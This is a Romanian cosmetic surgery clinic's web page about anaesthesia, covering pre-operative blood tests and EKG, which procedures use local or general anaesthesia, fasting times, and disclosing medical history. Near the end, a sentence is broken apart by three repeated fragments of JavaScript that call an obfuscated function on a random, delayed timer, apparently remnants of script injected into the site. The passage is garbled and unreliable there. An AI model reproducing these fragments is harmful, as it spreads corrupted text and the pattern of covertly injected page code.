surgery_body_en

Dr. Ovidiu Grecu

Despre operatii estetice

Operatiile estetice au menirea de-a imbunatati acele parti ale
corpului nostru care nu sunt dezvoltate perfect sau in
asimetrie cu restul caracteristicilor anatomice ale corpului.
bkgd31

Dr. Ovidiu Grecu

Proteze Mamare

Implanturile mamare sunt de diferite tipuri si forme,
cu diferite invelisuri si continuturi. Impreuna cu
chirurgul dumneavoastra veti alege tipul si forma protezei,
pentru a putea ajunge la rezultatul care-l doriti.

Anestezia

Dr. Ovidiu Grecu – Expertul tau in operatii estetice

Aceasta este procedura si tipul de monitorizare folosit si de specialistii nostri.


In clinica noastra, orice interventie care necesita anestezie, este asigurata de echipa noastra de specialisti formata din doctorii anestezisti Ilie Simona si Ilie George, si coordonata de domnul doctor anestezist  Victor Cullman.

Inainte de administrarea anesteziei trebuie evaluata starea de sanatate a pacientei printr-un set de analize de sange pe care le efectuati in prealabil, electrocardiograma (EKG) in ziua operatiei si alte investigatii in functie de caz.
Unele operatii estetice se desfasoara sub anestezie locala sau loco-regionala: excizii de nevi si papiloame, lipoame, otoplastii externe, blefaroplastii, varice, grefe cutanate, lipoaspiratii etc.
Operatiile de amploare  necesita anestezie generala: rinoplastia, abdominoplastia, implantele mamare, liftingul de divrse tipuri, mamoreductii etc.

Cu 6 ore inainte de anestezia generala, nu aveti voie sa  mancati alimente solide si sa nu  beti nimic cu 4 ore inainte! Veti fi hidratat cu ajutorul perfuziei in clinica! Chiar in cazul interventiilor cu anestezie locala, nu serviti  un mic dejun copios sau un pranz prelungit. Anxietatea si alimentatia preoperatorie cresc riscul de aparitie a greturilor si varsaturilor postoperatorii.

Daca tineti post, sausunteti in dieta este bine sa nu programati in aceasta perioada sau in cea imediat urmatoare o operatie laborioasa (marire sani sani, rinoplastie sau lifting), pentru ca este posibil ca vindecarea sa nu fie foarte rapida.

Omiterea, din neglijenta sau cu buna stiinta, a unor afectiuni pe care le-ati avut si pe care doriti sa le ascundeti din jena sau doar pentru a grabi programarea la operatie presupune asumarea unui risc de care, poate, nu sunteti pe deplin constient, dar care poate influenta negativ actul medical.
Asadar va rugam sa colaborati cu personalul medical pe toata perioada internarii dumneavoastra in clinica noastra.
Procedura anesteziei este standom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andardizata iar riscurile sunt minime datorita cercetarilor avansate in domeniu si a medicamentelor performante folosite in zilele noastre de orice doctor anestezist.

Suna Acum!
Navigheaza!